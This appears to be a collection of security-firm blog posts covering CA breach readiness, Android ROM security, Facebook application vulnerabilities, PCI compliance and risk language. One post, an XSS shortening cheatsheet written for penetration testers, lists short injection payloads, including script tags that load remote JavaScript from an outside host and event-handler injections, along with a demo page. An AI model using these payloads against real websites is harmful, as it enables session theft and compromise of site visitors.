Are You Prepared for Certificate Authority Breaches?

By Nate Couper

In the last few years, security breaches of signed SSL certificates, as well as a number of certificate authorities (CA’s) themselves, have illustrated gaps in the foundations of online security.

  • Diginotar
  • Comodo
  • Verisign
  • others

It is no longer safe to assume that CA’s, large or small, have sufficient stake in their reputation to invest in security that is 100% effective.  In other words, it’s time to start assuming that CA’s can and will be breached again.

Fortunately for the white hats out there, NIST has just released a bulletin on responding to CA breaches.  Find it on NIST’s website at http://csrc.nist.gov/publications/nistbul/july-2012_itl-bulletin.pdf.

The NIST document has great recommendations for responding to CA breaches, including:

  • Document what certificates and CA’s your organization uses.
  • Document logistics and information required to respond to CA compromises.
  • Review and understand CA’s in active use in your organization.
  • Understand “trust anchors” in your organization.
  • Develop policies for application development and procurement, and implement them.
  • Understand and react appropriately to CA breaches.

Let’s dive into these:

1. Document the certificates and CA’s that your organization uses

Any compliance wonk will tell you that inventory is your first and best control.  Does your organization have an inventory?

Let’s count certificates.  There’s http://www.example.com, www2.example.com, admin.example.com, backend.example.com, and there’s mail.example.com.  There may also be VPN.example.com, ftps.example.com, ssh.example.com.  These are the obvious ones.

Practically every embedded device from the cheapest WIFI router to the lights-out management interface on your big iron systems these days comes with an SSL interface.  Count each of those.  Every router, switch, firewall, every blade server enclosure, every SAN array.  Take a closer look at your desktops.  Windows has a certificate database, Firefox carries its own, Java has its own, and multiple instances of Java on a single system can have multiple CA databases.  Now your servers—every major OS ships with SSL capabilities, Windows, Linux (OpenSSL), Unix.  Look at your applications – chances are every piece of J2EE and .NET middleware has a CA database associated with it.  Every application your organization bought or wrote that uses SSL probably has a CA database.  Every database, every load balancer, every IDS / IPS.  Every temperature sensor, scanner, printer, and badging system that supports SSL probably has a list of CA’s somewhere.

All your mobile devices.  All your cloud providers and all the services they backend to.

If your organization is like most, you probably have an excel spreadsheet with a list of AD servers, or maybe you query a domain controller when you need a list of systems.  Forget about software and component inventory.  Don’t even think about printers, switches, or cameras.

If you’re lucky enough to have a configuration management database (CMDB), what is its scope?  When was the last time you checked it for accuracy?  In-scope accuracy rates of 75% are “good”, if some of my clients are any measure.  And CMDB scope rarely exceeded production servers.

Each one of these devices may have several SSL certificates, and may trust hundreds of CA’s for no reason other than it shipped that way.

Using my laptop as an example, I’ve got several hundred “trusted” CA’s loaded by default into Java, Firefox, IE and OpenSSL.  Times five or so to account for the virtual machines I frequent.  Of those thousands of CA’s, my system probably uses a dozen or so per day.

2. Document logistics and information required to respond to CA breaches

How exactly do you manage the list of trusted CA’s on your iPad anyway?  Your load balancer?  Who is responsible for these devices, and who depends on them? If you found out that Thawte was compromised tomorrow, would you be able to marshal all the people who manage these systems in less than a day?  In a week?

What would it take to replace certificates, to tweak the list of CA’s across the enterprise?  It will definitely take longer if you’re trying to figure it out as you go.

3. Review and understand CA’s in active use in your organization

Of all the dozens of CA’s on my laptop, I actually use no more than a dozen or so each day.  In fact, it would be noteworthy if more than a handful got used at all.  I could disable hundreds of them and never notice.  After all, I don’t spend a lot of time on Romanian or Singaporean sites, and CA’s from those regions probably don’t see a lot of foreign use.

Most organizations are savvy enough to source their certificates from at most a handful of trusted CA’s.  A server might only need one trusted CA.  Ask your network and application administrators – which CA’s do we trust and which do we need to trust?  It might make sense to preemptively strike some or all the CA’s you’re not actually using, if only in the name of reducing attack surface.

4. Understand “trust anchors” within your organization.

Trust Anchors are the major agents in a PKI – the CA’s.  Trust anchors provide rules and services to govern the roles of others such as the intermediates, the registrars, and the users of certificates.  Go back through your inventory (you made one of those, right?) and document the configuration.  What do the trust anchors allow and disallow with your certificates?  Will revoked certificates get handled correctly?  How do you configure it?

Does your organization deploy internal CA’s?  Which parts of the organization control the internal CA’s, and what other parts of the business depend on them?  What internal SLA’s / SLO’s are afforded?  What metrics measure them?

5. Develop policies for application development and procurement.

How many RSA SecurID customers really understood that RSA was holding on to secret information that could contribute to attacks against RSA’s customers?  Did your organization ask RIM if trusted CA’s on your Blackberries could be replaced?  Do you use external CA’s for purely internal applications, knowing full well the potential implications of an external breach?

Does your purchase and service contract language oblige your vendor even to tell you if they do have a breach, or will you have to wait till it turns up on CNN?  Do they make claims about their security, and are their claims verifiable?  Do they coast on vague marketing language, or ride on the coattails of once-hip internet celebrities and gobbled-up startups?

6. Understand CA breaches and react appropriately.

Does your incident response program understand CA breaches?  Can you mobilize your organization to do what it needs to when the time comes, and within operational parameters?

CA breaches have happened before and will happen again.  NIST has again delivered a world-class roadmap for achieving enterprise security objectives.  Is your organization equipped?

XSS Shortening Cheatsheet

By Ben Toews

In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting a simple <b>hello</b> into their page, but it leaves much more of an impression of severity when you can at least make an alert box.

My go to line for testing XSS is always <script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because 123123 is easy to grep for and will rarely show up as a false positive (a quick Google search returns only 9 million pages containing the string 123123). It is also nice because it doesn’t require apostrophes.

This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your <script> tag, some more well known than others. Here are a few:

  • If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g. <script src='//btoe.ws/xss.js'></script>
  • If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if  you can upload a malicious JavaScript file to the server you are trying to get XSS on. Eg. <script src='evil.js'></script>
  • If you are including a JavaScript file from another domain, there is no reason why its extension must be .js. Pro-tip: you could even have the malicious JavaScript file be set as the index on your server… Eg. <script src='http://btoe.ws'>
  • If you are using IE you don’t need to close the <script> tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g. <script src='http://btoe.ws/evil.js'>
  • You don’t need quotes around your src attribute. Eg. <script src=http://btoe.ws/evil.js></script>

In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is <script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely is that you will have to host your malicious code on another domain. I own btoe.ws, which is short, but not quite as handy as some of the five letter domain names. If you have one of those, the best you could do is <script src=ab.cd>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27 character option of <script src=ab.cd></script>. Thats still pretty short, but we are back over my 20 character limit.

Time to give up? I think not.

Another option is to forgo the <script> tag entirely. After all, ‘script’ is such a long word… There are many one letter HTML tags that accept event handlers. onclick and onkeyup are even pretty short. Here are a couple more tricks:

  • You can make up your own tags! E.g. <x onclick="alert(1)">foo</x>
  • If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g. <x onclick='alert(1)'>.
  • You don’t need to wrap your code in quotes. Eg. <b onclick=alert(1)>foo</b>
  • If the page already has some useful JavaScript (think JQuery) loaded, you can call their functions instead of your own. Eg. If they have a function defined as function a(){alert(1)} you can simply do <b onclick='a()'>foo</b>
  • While onclick and onkeyup are short when used with <b> or a custom tag, they aren’t going to fire without user interaction. The onload event of the <body> tag on the other hand will. I think that having duplicate <body> tags might not work on all browsers, though.  E.g. <body onload='alert(1)'>

Putting these tricks together, our optimal solution (assuming they have a one letter function defined that does exactly what we want) gives us <b onclick=a()>. Similar to the unrealistically good <script> tag example from above, this comes in at 14 characters. A more realistic and useful line might be <b onclick=alert(1)>. This comes it at exactly 20 characters, which is within my limit.

This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the <b> tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject <. This would likely break the page, but it would at least be noticable and would prove your point.

This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at the moment. If you know that some of the above code does not work in other browsers, please comment bellow and I will make an edit, but please don’t tell me what does and does not work in lynx.

If you want to see some of these in action, copy the following into a file and open it in your your browser or go to http://mastahyeti.com/vps/shrtxss.html.

Edit: albinowax points out that onblur is shorter than onclick or onkeyup.


<html>
<head>
<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>
</head>
<body>

<!– XSS Injected here –>
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!– End XSS Injection –>

<h1>XSS ROCKS</h1>
<p>click me</p>
<form>
<input value=’try typing in here’>
</form>
</body>
</html>

PS: I did some Googling before writing this. Thanks to those at sla.ckers.org and at gnarlysec.

CyanogenMod 9, An Android ROM Without Root

By Jon Janego

As a follow up to my blog post in December about custom Android ROMs, i’d like to comment on the news released by the CyanogenMod team last month about their removal of default root access in their upcoming CM9 release.

In a post on their blog  a few weeks ago, the CyanogenMod team announced that they were changing the way that they handle root access on devices using their ROM.  Previous releases of their ROM  have root access enabled by default, as is common in most custom ROMs.  That had the result that any application that requested root access on the device would be granted it.  This is great for some of the power-user applications that are common among the Android modding scene – Titanium Backup is one that comes to mind – but it comes with a significant security risk, since a malicious application installed on the device could have full root access without the user being aware of what it was doing.  The CyanogenMod team acknowledged this in their post, saying, “Shipping root enabled by default to 1,000,000+ devices was a gaping hole.

What the team is planning to do instead is to implement root access in a selective, user configurable manner.  A device using the ROM has root access disabled by default, but can be configured to only enable it for ADB console access, to enable it only for applications, or to have it enabled across the board.  This type of control leaves it in the hands of the users to choose the level of risk that they are willing to accept.  Obviously, many of the tech-savvy enthusiasts will immediately enable unfettered root access. However, for the large part of the Android community that is only interested in custom ROMs for the customizable interfaces offered by them, this will be a welcome and overdue security protection for them.  Already, it is clear in the comments to the CyanogenMod post that not everyone understands what the risk of root level access is – someone asks the community to “explain this for the liberal arts majors.

Just so it’s clear, the removal of root level access is strictly at the operating system layer.  Installing a custom ROM onto an Android phone still requires unlocking the bootloader, which on most devices requires running a “jailbreaking” exploit of some sort.  There are a few exceptions to this; the Google Nexus line of phones lets you unlock the bootloader with only some console commands, and HTC and Motorola have also been providing bootloader unlocks to their devices.  Unless it’s coming from the manufacturer, there is always the possibility of some risk when executing unknown code on your device.  But once you’ve gotten to the point of installing the custom ROM, there was the further risk of having root-level access to the operating system easily available, which is the gap that CyanogenMod has closed here.

To me, this indicates that the CyanogenMod team is acknowledging their influence in the community and using it to educate users on good security measures.  Baking in a “secure by default” configuration to the most popular ROM will be good for everyone.  Kudos to them for acknowledging this, and let’s hope that it leads to a more secure Android ecosystem for everyone!

CyanogenMod Logo Used Under a Creative Commons Attribution License

Facebook Applications Have Nagging Vulnerabilities

By Neohapsis Researchers Andy Hoernecke and Scott Behrens

This is the second post in our Social Networking series. (Read the first one here.)

As Facebook’s application platform has become more popular, the composition of applications has evolved. While early applications seemed to focus on either social gaming or extending the capabilities of Facebook, now Facebook is being utilized as a platform by major companies to foster interaction with their customers in a variety forms such as sweepstakes, promotions, shopping, and more.

And why not?  We’ve all heard the numbers: Facebook has 800 million active users, 50% of whom log on everyday. On average, more than 20 million Facebook applications are installed by users every day, while more than 7 million applications and websites remain integrated with Facebook. (1)  Additionally, Facebook is seen as a treasure trove of valuable data accessible to anyone who can get enough “Likes” on their page or application.

As corporate investments in social applications have grown, Neohapsis Labs researchers have been requested to help clients assess these applications and help determine what type of risk exposure their release may pose. We took a sample of the applications we have assessed and pulled together some interesting trends. For context, most of these applications are very small in size (2-4 dynamic pages.)  The functionality contained in these applications ranged from simple sweepstakes entry forms and contests with content submission (photos, essays, videos, etc.) to gaming and shopping applications.

From our sample, we found that on average the applications assessed had vulnerabilities in 2.5 vulnerability classes (e.g. Cross Site Scripting or SQL Injection,) and none of the applications were completely free of vulnerabilities. Given the attack surface of these applications is so small, this is a somewhat surprising statistic.

The most commonly identified findings in our sample group of applications included Cross-Site Scripting, Insufficient Transport Layer Protection, and Insecure File Upload vulnerabilities. Each of these vulnerabilities classes will be discussed below, along with how the social networking aspect of the applications affects their potential impact.

Facebook applications suffer the most from Cross-Site Scripting. This type of vulnerability was identified on 46% of the applications sampled.  This is not surprising, since this age old problem still creeps up into many corporate and personal applications today.  An application discovered to be vulnerable to XSS could be used to attempt browser based exploits or to steal session cookies (but only in the context of the application’s domain.)

These types of applications are generally framed inline [inling framing, or iframing, is a common HTML technique for framing media content] on a Facebook page from the developer’s own servers/domain. This alleviates some of the risk to the user’s Facebook account since the JavaScript can’t access Facebook’s session cookies.  And even if it could, Facebook does use HttpOnly flags to prevent JavaScript from accessing session cookies values.  But, we have found that companies have a tendency to utilize the same domain name repeatedly for these applications since generally the real URL is never really visible to the end user. This means that if one application has a XSS vulnerability, it could present a risk to any other applications hosted at the same domain.

When third-party developers enter the picture all this becomes even more of a concern, since two clients’ applications may be sharing the same domain and thus be in some ways reliant on the security of the other client’s application.

The second most commonly identified vulnerability, affecting 37% of the sample, was Insufficient Transport Layer Protection While it is a common myth that conducting a man-in-the-middle attack against cleartext protocols is impossibly difficult, the truth is it’s relatively simple.  Tools such as Firesheep aid in this process, allowing an attacker to create custom JavaScript handlers to capture and replay the right session cookies.  About an hour after downloading Firesheep and looking at examples, we wrote a custom handler for an application that was being assessed that only used SSL when submitting login information.   On an unprotected WIFI network, as soon as the application sent any information over HTTP we had valid session cookies, which were easily replayed to compromise that victim’s session.

Once again, the impact of this finding really depends on the functionality of the application, but the wide variety of applications on Facebook does provide a interesting and varied landscape for the attacker to choose from.  We only flagged this vulnerability under specific circumstance where either the application cookies were somehow important (for example being used to identify a logged in session) or the application included functionality where sensitive data (such as PII or credit card data) was transmitted.

The third most commonly identified finding was Insecure File Upload. To us, this was surprising, since it’s generally not considered to be one of the most commonly identified vulnerabilities across all web applications. Nevertheless 27% of our sample included this type of vulnerability. We attribute its identification rate to the prevalence of social applications that include some type of file upload functionality (to share an avatar, photo, document, movie, etc.)

We found that many of the applications we assessed have their file upload functionality implemented in an insecure way.  Most of the applications did not check content type headers or even file extensions.  Although none of the vulnerabilities discovered led to command injection flaws, almost every vulnerability exploited allowed the attacker to upload JavaScript, HTML or other potentially malicious files such as PDF and executables.  Depending on the domain name affected by this vulnerability, this flaw would aid in the attacker’s social engineering effort as the attacker now has malicious files on a trusted domain.

Our assessment also identified a wide range of other types of vulnerabilities. For example, we found several of these applications to be utilizing publicly available admin interfaces with guessable credentials. Furthermore, at least one of the admin interfaces was riddled with stored XSS vulnerabilities. Sever configurations were also a frequent problem with unnecessary exposed services and insecure configuration being repeatedly identified.

Finally, we also found that many of these web applications had some interesting issues that are generally unlikely to affect a standard web application. For example, social applications with a contest component may need to worry about the integrity of the contest. If it is possible for a malicious user to game the contest (for example by cheating at a social game and placing a fake high score) this could reflect badly on the application, the contest, and the sponsoring brand.

Even though development of applications integrated with Facebook and other social network sites in increasing, we’ve found companies still tend to handle these outside of their normal security processes. It is important to realize that these applications can present a risk and should be thoroughly examined just like traditional stand alone web applications.

The Security Implications of Custom Android ROMs

By Jon Janego

As most smartphone geeks like myself are undoubtedly aware, the latest phone in Google’s Nexus line, the Samsung Galaxy Nexus, was released for Verizon Wireless last week.  Mine just arrived last night, and it’s fantastic (although huge!)

The Nexus line of devices are unique among Android phones in that they are essentially a commercial line of the internal development phones used at Google.  As such, they are designed to allow easy installation of custom firmware.  This makes them especially popular with the robust Android “modding” community, which develops customized firmware that can be run on Android devices that extend the functionality beyond what is initially provided by the handset manufacturer.

Made for Modders

The Galaxy Nexus appears to be the biggest Nexus phone launch in Google’s history, initially being offered by the largest carrier in the US, Verizon, and the second-largest carrier in the UK, O2.The popularity of the Galaxy Nexus will likely draw a large number of people into the Android modding community because of the low barrier to entry that it presents.  Already, on the popular Android blog Droid Life, there is an article about unlocking the Galaxy Nexus’ bootloader, which allows for installation of custom firmware, that has over 400 comments, and another post on the same blog about “rooting” the phone has well over 300 comments.The Android customization community is a large and robust one.  However, like many open-source and community-based development projects, the majority of users just want the project to “work”, and have little-to-no interest in viewing the source code or having a deep understanding of how it functions.  Despite user bases sometimes numbering in the millions, a relatively small group of developers do most of the creation and distribution of the software.

The problem of software authenticity has been encountered before by the linux community, and over the last decade, that community has developed distribution methods such as centralized Debian APT repositories that provide some degree of certainty over what the end user is actually installing on their computer.  Additionally, many linux users still download the source code for projects and compile them locally on their computer.  Within the Android modding community, neither of these options have been implemented with the same level of maturity that linux has seen.  The more popular aftermarket firmware, or “ROMs”, such as CyanogenMod, are distributed by more accountable means, providing MD5 checksums for the files and a clear distribution network.  However, often, Android customization software is provided through links to anonymous file-sharing sites such as Mediafire and Megaupload.  This creates the opportunity to trick a user into installing malicious files.

A Ripe Target

There has already been at least one documented case of malware targeting custom Android ROMs, a trojan affected devices in the Chinese market.  With the popularity of the Galaxy Nexus, and the continued interest in Android customization community, this could become an attack vector that is more and more appealing to malware authors.  And the fact that majority of customized Android software is distributed without the usage of the Android Market, users do not have the additional means of protection that the Market provides, namely the “kill-switch” for apps that Google has flagged as malicious that were installed via the Android Market.

So how can end users protect themselves, while still participating in the Android customization community?  The most important thing that any technology user can do is to educate themselves about the software they install.  Security researcher Dan Rosenberg wrote an excellent blog post summarizing exactly how “rooting” works, which is a concept that many users want, but fewer truly understand.  Too often, users are tempted to just install the attachment that someone on a forum or blog says “works”, without question.  Also, users should avoid downloading and installing software from sources that are anonymous or unaccountable.  Instead, download from the primary source of the software developer, and validate the MD5 checksum of the file before installing it.  And often, many of the files shared on forums or anonymous upload sites are those provided directly Google or the phone manufacturers themselves.  Instead of downloading from the anonymous links, download these files from Google directly.

The Android community is already beginning to tackle these problems.  The popular ROM manager ClockworkMod is attempting to become an authoritative source for aftermarket software.  They coordinate with the developers of custom software and allow users to install files directly from the developers’ Git repositories.  However, this is still reliant upon the goodwill and trustworthiness of the developers.  ClockworkMod does not perform any code review of the ROMs that they aggregate, and while they may be able to de-list one that has a security vulnerability, there is still not a way to automatically remove the software from installed devices.

Looking Forward

In the future, I hope that the popular Android blogs such as Droid-Life, and forums such as XDA-developers will begin linking to central, trusted software repositories, rather than the anonymous file sharing sites or forum post attachments that are currently commonly used.  In the long-term, I would not be surprised to see an even more formalized system be implemented by the Android community, similar to the Debian APT repositories, but there is still some time to go.  Until then, Android users interested in customizing their devices should try and stay educated about their technology, and be very skeptical of any software that they install.  While the mobile carriers have recently had some credibility issues with the CarrierIQ fiasco, they are for the most part held far more accountable than any custom ROM developer will ever be.  Given the sensitivity of the data stored on mobile devices, a user should think very closely about what they are willing to install onto it.  As for me, I have already unlocked the bootloader to my Nexus Galaxy, but will probably refrain from installing any custom third-party ROMs until I repurpose it as a research device, at least another year or two down the road.  But the draw of the enhanced features and controls that the custom ROMs provide will likely lead many users down that path.  The integrity of your data ultimately resides with you, so I hope that everyone carefully weighs their decision to install new firmware onto their most sensitive and personal piece of technology.  Be careful out there!

What Security Teams Can Learn From The Department of Streets & Sanitation

As I sit here typing in beautiful Chicago, a massive blizzard is just starting to hit outside.  This storm is expected to drop between 12 to 20 inches over the next 24 hours, which could be the most snowfall in over 40 years.  Yet in spite of the weather, the citizens and city workers remain calm, confident in the fact that they know how to handle an incident like this.  A joke has been going around on twitter about the weather today – “Other cities call this a snowpacolypse.  Chicago calls it ‘Tuesday’”.

Northern cities like Chicago have been dealing with snowstorms and snow management for decades, and have gotten pretty stable at it.  Yet, when cities fail at it, there can be dramatic consequences – in 1979, the incumbent mayor of Chicago, Michael Bilandic lost to a challenger, with his poor response to a blizzard cited as one of the main reasons for his defeat.

The same crisis management practices, as well as the same negative consequences attached to failure, apply to information security organizations today.  Security teams should pay attention to what their better established, less glamorous counterparts in the Department of Streets and Sanitation do to handle a crisis like two feet of snow.

So, how do cities adequately prepare for blizzards?  The preparations can be summarized into four main points:

  • Prepare the cleanup plan in advance
  • Get as much early warning as possible
  • Communicate with the public about how to best protect themselves
  • Handle the incident as it unfolds to reduce loss of continuity

These steps are all also hallmarks of a mature security program:

  • Have an incident response plan in place in advance of a crisis
  • Utilize real-time detection methods to understand the situation
  • Ensure end users are aware of the role that they play in information security
  • Remediate security incidents with as little impact to the business as possible

An information security program that is proactive in preparing for security incidents is one that is going to be the most successful in the long run.  It will gain the appreciation of both end users and business owners, by reducing the overall impact of a security event.  Because as winter in Chicago shows us – you can’t stop a snowstorm from coming.  Security incidents are going to happen.  The test of a truly mature organization is how they react to the problem once it arrives.

Response to Visa’s Chief Enterprise Risk Officer comments on PCI DSS

Visa’s Chief Enterprise Risk Officer, Ellen Richey, recently presented at the Visa Security Summit on March 19th. One of the valuable points made in her presentation was defending the value of implementing PCI DSS to protect against data theft. In addition, Ellen Richey spoke about the challenge organizations face, not only becoming compliant, but proactively maintaining compliance, defending against attacks and protecting sensitive information.

Recent compromises of payment processors and merchants that were stated to be PCI compliant have brought criticism to the PCI program. Our views are strongly aligned with the views presented by Ellen Richey. While the current PCI program requires an annual audit, this audit is simply an annual health-check. If you were to view the PCI audit like a state vehicle inspection. Even though at the time of the inspection everything on your car checks out, this does not prevent the situation of days later your brake lights go out. You would still have a valid inspection sticker, but are no longer in compliance with safety requirements. It is the owner’s responsibility to ensure the car is maintained appropriately. Similarly in PCI, it is the company’s responsibility to ensure the effectiveness and maintenance of controls to protect their data in an ongoing manner.

Ellen Richey also mentioned increased collaboration with the payment card industry, merchants and consumers. Collaboration is a key step to implementing the technology and processes necessary to continue reducing fraud and data theft. From a merchant, service provider and payment processor perspective, new technologies and programs will continue to reduce transaction risk, but, today, there are areas where these organizations need to proactively improve. The PCI DSS standard provides guidance around the implementation of controls to protect data. Though in addition to protecting data, merchants, service providers and processors need to proactively address their ability to detect attack and be prepared to respond effectively in the event of a compromise. These are two areas that are not currently adequately addressed by the PCI DSS and are areas where we continue to see organizations lacking.

See the following link to the Remarks by Ellen Richey, Chief Enterprise Risk Officer, Visa Inc. at the Visa Security Summit, March 19, 2009:

http://www.corporate.visa.com/md/dl/documents/downloads/EllenRichey09SummitRemarks.pdf

Weak Application Security = Non-Compliance

I had to post about this one – our general counsel and compliance specialist Dave Stampley wrote an article recently at Information Week about the importance of ensuring application security as part of your regulatory compliance efforts. From the article:

Web-application security vulnerabilities pose a unique compliance risk for companies. Unlike compliance failures that take place in the background–for example, an unencrypted business-to-business transmission of sensitive consumer data–application weaknesses are open to discovery by any skilled Web surfer and even consumers themselves.

“The FTC appears to be taking a strict liability approach to E-commerce security flaws,” says Mary Ellen Callahan, an attorney at Hogan & Hartson in Washington, D.C., who has represented clients facing government privacy compliance investigations. “White-hat hackers and tipsters have prompted a number of enforcement actions by reporting Web-site flaws they discovered.”

Read the full article here

Whose Risk?

I often get frustrated when we talk about risk, measurement, metrics, and (my new least favorite buzz word) “key performance indicators”. Because we (as an industry) have a tendency to drop the audience from the statement of risk.

That may sound confusing, but I’ll illustrate by example. This is a real sentence that I hear far too often:

Doing that presents too much risk.

Unfortunately, that sentence is linguistically incomplete. The concept of “risk” requires specification of the audience – Risk to whom/what? This is a similar problem as that which Lakoff presents in Whose Freedom? – certain concepts require a reference to the audience in order to make sense of them. Leaving the audience unspecified is productive when used in marketing (or politics), but creates massive confusion when actually trying to have real productive discourse.

A recent post at Security Retentive illustrates the kind of confusion that ensues when the audience for risk metrics/measurements isn’t specified. (I have also previously talked (ranted?) about this type of confusion here and here.

This confusion fundamentally arises from the need to remember that risk is relative to an audience. The confusion arises because of a lack of perspective – each person in the discourse applies the “risk” to their own perspective, and comes up with radically differing meanings.

It seems important that when we’re talking about and attempting to measure and specify risk, we need to always present the data/information to a relevant audience: risk to what/whom is an important way of ensuring that we don’t remain mired in the kind of confusion that Security Retentive talked about.